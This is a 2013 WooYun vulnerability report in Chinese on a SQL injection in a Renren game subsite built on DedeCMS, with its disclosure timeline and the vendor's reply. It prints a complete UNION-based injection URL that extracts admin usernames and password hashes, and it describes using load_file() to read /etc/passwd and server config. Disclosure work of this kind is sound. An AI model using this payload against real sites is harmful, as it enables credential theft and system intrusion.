漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-018088
漏洞标题:人人网某分站SQL注入漏洞
相关厂商:人人网
漏洞作者: txcbg
提交时间:2013-01-30 09:47
修复时间:2013-03-16 09:47
公开时间:2013-03-16 09:47
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:11
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-01-30: 细节已通知厂商并且等待厂商处理中
2013-01-30: 厂商已经确认,细节仅向厂商公开
2013-02-09: 细节向核心白帽子及相关领域专家公开
2013-02-19: 细节向普通白帽子公开
2013-03-01: 细节向实习白帽子公开
2013-03-16: 细节向公众公开
简要描述:
人人网某分站SQL注入漏洞,可导致任意文件读取。
详细说明:
人人网战天下游戏官方网站www.ztx.renren.com所利用的DedeCMS存在一个已经公布的SQL注入漏洞,通过注入漏洞可以获得管理员用户名、密码,连接数据库的用户等敏感信息,造成敏感信息泄露。并且发现可以在注入点通过load_file()函数读取文件内容,差不多相当于任意文件读取了。比如可以读取/etc/passwd,/etc/httpd/conf/httpd.conf等文件从而获得敏感信息。
漏洞证明:
利用网上已经公布的漏洞利用代码来爆管理员的用户名和密码:
http://www.ztx.renren.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
成功爆出了两个管理员的用户名和加密的密码,如图1。
看了下连接数据库的用户,发现是root,如图2。
来张读取/etc/passwd的截图,如图3。
修复方案:
你们懂的。
版权声明:转载请注明来源 txcbg@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2013-01-30 12:38
厂商回复:
Tks!!!这些游戏论坛伤不起
最新状态:
暂无